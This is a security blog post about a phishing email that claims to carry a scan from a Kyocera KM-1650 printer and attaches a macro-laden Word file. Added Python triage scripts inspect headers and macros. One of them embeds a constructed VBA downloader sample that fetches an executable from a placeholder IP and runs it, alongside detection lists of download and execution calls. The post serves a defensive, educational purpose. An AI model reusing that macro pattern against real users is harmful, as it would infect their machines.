Scanner sent you a document? Beware of malware attack


Here is an email I received this morning, claiming to come from an email address at my domain name: .


The email is fairly perfunctory: its subject line is "Scan from KM1650", and its body text reads "Please find attached your recent scan".

Attached to the email is a Microsoft Word document called SCAN7318_000.DOC.

Now, this might be slightly plausible if I had a scanner attached to my network which I had configured to email me scans. But I don't.

One assumes the criminals behind the attack are banking that my place of work uses a Kyocera KM-1650 multi-function printer, or that I'm simply so excited about receiving an email from a scanner that I would open the attachment without even thinking.

Of course, if you receive the malware in your email, chances are that it won't claim to be from . Instead, it will probably pretend to be from scanner@example.com, where example.com matches the domain and tld of your email address.
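The visible From: address is just a line of text the sender types; nothing in SMTP checks it against the account that actually sent the message. The script below is an added example (it is not from the original post and does not process the real email described above): it parses a constructed message with a From: header on the recipient's own domain, compares that domain with the envelope sender recorded in Return-Path and the relay recorded in Received:, and reports whether the attachment is a legacy .doc (an OLE2 container, the format that carries VBA macros). The host names and the 203.0.113.7 address are made up.

```python
import re
import email
from email import policy
from email.utils import parseaddr

# Constructed sample of the kind of message described above (not the
# actual email from the post). The visible From: header carries the
# recipient's own domain, but the envelope sender (Return-Path) and the
# relay recorded in Received: belong somewhere else entirely. Host names
# and the IP address are invented (RFC 5737 documentation range).
RAW_MESSAGE = b"""Return-Path: <bounce-4471@mail.not-your-domain.example>
Received: from mail.not-your-domain.example (mail.not-your-domain.example [203.0.113.7])
\tby mx.example.com with ESMTP id 7Yt2k3; Thu, 11 Feb 2016 09:12:01 +0000
From: scanner@example.com
To: someone@example.com
Subject: Scan from KM1650
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain

Please find attached your recent scan
--b1
Content-Type: application/msword; name="SCAN7318_000.DOC"
Content-Disposition: attachment; filename="SCAN7318_000.DOC"
Content-Transfer-Encoding: base64

0M8R4KGxGuEAAAAAAAAAAAAAAAAAAAAA
--b1--
"""

# Magic bytes of an OLE2 compound file, the container used by the legacy
# .doc format (and the place where VBA macro streams are stored).
OLE2_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"

# Extensions that can carry executable content and deserve a second look
# when they arrive unsolicited.
RISKY_EXTENSIONS = (".doc", ".docm", ".dot", ".xls", ".xlsm",
                    ".rtf", ".js", ".vbs", ".zip")


def address_domain(header_value):
    """Return the lower-cased domain part of an address header, or ''."""
    _, addr = parseaddr(str(header_value or ""))
    return addr.rpartition("@")[2].lower()


def triage_message(raw_bytes):
    msg = email.message_from_bytes(raw_bytes, policy=policy.default)

    header_from = address_domain(msg["From"])
    return_path = address_domain(msg["Return-Path"])

    # Each hop prepends its own Received: header, so the last one in the
    # list is the earliest hop: the host that handed the message to us.
    received = msg.get_all("Received") or []
    origin_host = None
    if received:
        m = re.search(r"from\s+(\S+)", str(received[-1]))
        origin_host = m.group(1).lower() if m else None

    attachments = []
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        payload = part.get_payload(decode=True) or b""
        attachments.append({
            "filename": name,
            "risky_extension": name.lower().endswith(RISKY_EXTENSIONS),
            "ole2_container": payload.startswith(OLE2_MAGIC),
        })

    return {
        "header_from_domain": header_from,
        "return_path_domain": return_path,
        "origin_host": origin_host,
        # The From: header is free text chosen by the sender; when it does
        # not line up with the envelope sender, treat it as unverified.
        "envelope_mismatch": bool(return_path) and header_from != return_path,
        "attachments": attachments,
    }


if __name__ == "__main__":
    import json
    print(json.dumps(triage_message(RAW_MESSAGE), indent=2))
```

A Return-Path that differs from the From: domain is a triage signal rather than proof of spoofing, since mailing lists and many bulk senders legitimately use a separate bounce address. The mechanisms that actually let a receiving server reject mail claiming your domain without your say-so are SPF, DKIM and DMARC records published for the domain; without them, anyone can put scanner@yourdomain in the From: line.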

There has been a long history of cybercriminals spamming out malware pretending to be from printers and scanners, and there have been a number of recent campaigns suggesting that it's a disguise that continues to dupe the unwary.

A quick check on VirusTotal reveals that relatively few anti-virus products are identifying the malware at present, but I can tell you that the Word document contains auto-executing macros (VBA code that runs as soon as the document is opened with macros enabled) which attempt to download further malicious code from the net, designed to infect your Windows PC.
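What makes such a macro a "downloader" is a recognisable combination: a procedure Word runs on its own when the document opens, a call that fetches something over the network, and a call that executes it. The script below is an added example, not code from the original post, and it works on VBA source that has already been pulled out of the document (in practice with a tool such as olevba from the oletools package). The VBA module it inspects is constructed to resemble this type of macro; it is not the macro from SCAN7318_000.DOC, whose code is not shown on the page, and the URL uses an RFC 5737 documentation address.

```python
import re

# Constructed sample VBA module written to look like the downloader macros
# this kind of campaign ships. It is NOT the macro from the SCAN7318_000.DOC
# sample; the URL points at an RFC 5737 documentation address.
SAMPLE_VBA = r'''
Attribute VB_Name = "ThisDocument"

Private Sub Document_Open()
    Dim p As String
    p = Environ("TEMP") & "\svc" & "host" & ".exe"
    Call URLDownloadToFile(0, "http://203.0.113.7/sc" & "an/update.exe", p, 0, 0)
    Shell p, vbHide
End Sub
'''

# Procedure names Office runs automatically when a document is opened or
# closed (Word and Excel variants).
AUTO_EXEC = {"autoopen", "document_open", "autoexec", "autoclose",
             "document_close", "auto_open", "workbook_open", "auto_close"}

# Calls that let a macro fetch something from the network ...
DOWNLOAD_CALLS = ("URLDownloadToFile", "XMLHTTP", "ADODB.Stream",
                  "WinHttpRequest", "powershell")
# ... and calls that run what was fetched.
EXEC_CALLS = ("Shell", "WScript.Shell", "WinExec", "ShellExecute")
# Common supporting cast in obfuscated macros.
OTHER_INDICATORS = ("CreateObject", "Environ", "Chr", "StrReverse")


def join_string_literals(src):
    """Fold "abc" & "def" into "abcdef" so split-up URLs and paths read whole."""
    pattern = re.compile(r'"([^"]*)"\s*&\s*"([^"]*)"')
    while True:
        new = pattern.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', src)
        if new == src:
            return src
        src = new


def procedures(src):
    """Names of every Sub/Function declared in the module."""
    return re.findall(r'^\s*(?:Private\s+|Public\s+)?(?:Sub|Function)\s+(\w+)',
                      src, re.M | re.I)


def find_calls(src, names):
    # Match whole identifiers only, so "Shell" does not fire on "powershell"
    # or on the ".Shell" of "WScript.Shell".
    return [n for n in names
            if re.search(r'(?<![\w.])' + re.escape(n) + r'(?!\w)', src, re.I)]


def triage_vba(src):
    folded = join_string_literals(src)
    procs = procedures(folded)
    auto = [p for p in procs if p.lower() in AUTO_EXEC]
    download = find_calls(folded, DOWNLOAD_CALLS)
    execute = find_calls(folded, EXEC_CALLS)
    other = find_calls(folded, OTHER_INDICATORS)
    urls = re.findall(r'https?://[^\s"\']+', folded)
    return {
        "auto_exec": auto,
        "download_calls": download,
        "exec_calls": execute,
        "other_indicators": other,
        "urls": urls,
        # Runs by itself, pulls something from the network, then executes
        # it: the combination that defines a macro downloader.
        "likely_downloader": bool(auto) and bool(download) and bool(execute),
    }


if __name__ == "__main__":
    for key, value in triage_vba(SAMPLE_VBA).items():
        print(f"{key}: {value}")
```

The string folding matters more than it looks: splitting "scan/update.exe" across several literals is one of the cheapest ways to hide a URL from a signature, which is part of why so few scanners flag a fresh sample. Keyword triage like this is a first pass only; a macro that builds its strings with Chr() calls or pulls them from document properties will need to be deobfuscated, or run in a sandbox, before the URL shows up.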

Always be suspicious of unsolicited emails, and be wary of opening files which may be attached to them. Acting recklessly with the contents of your inbox could mean your computer ends up compromised and your bank account plundered.

Repeat after me:

"Thou shalt not open dodgy-looking attachments in unsolicited emails"


3 Comments on "Scanner sent you a document? Beware of malware attack"

coyote (February 11, 2016 11:07 pm):

Just a thought that might make this a bit easier to understand (for many people):

'matches the domain and tld of your email address.'

When I first read that the font and my tired head made me read the L as 'I' but then I realised that it is actually 'L' (I suppose that's another reason to write the abbreviation in upper case). I know most won't know what it is and most won't care but you could just explain it away by saying (just to give an example):

'where example.com is your email domain' (because after all people think of example.com as a domain even though it's not that simple). Or another way:

'where example.com is what's after the @ in your email address'

Because let's be honest. Most people owning domains won't understand what top level domain means and even if they do they probably don't understand the (subtle) difference between a zone and a domain (or much of anything in DNS other than it maps from name to IP and IP to name). Besides administrators very few would even care about this as long as it works.

drsolly (February 11, 2016 11:56 pm):

9 hours later – 5 out of 54 products flag it.

Antivirus software usually does not protect you against emailed trojans.

Simon (February 12, 2016 3:34 pm):

As someone with only a basic knowledge of TLDs etc and the full workings of email my question is how exactly does a spammer make the email appear to come from your email address when it has not been compromised? How do you send an email that looks like it comes from scanner@mydomain.com when you have not first hacked and taken control of mydomain.com? Are they just altering the 'reply to' address and my basic email program isn't able to/set up to display the full email header which would show the true origin email address?
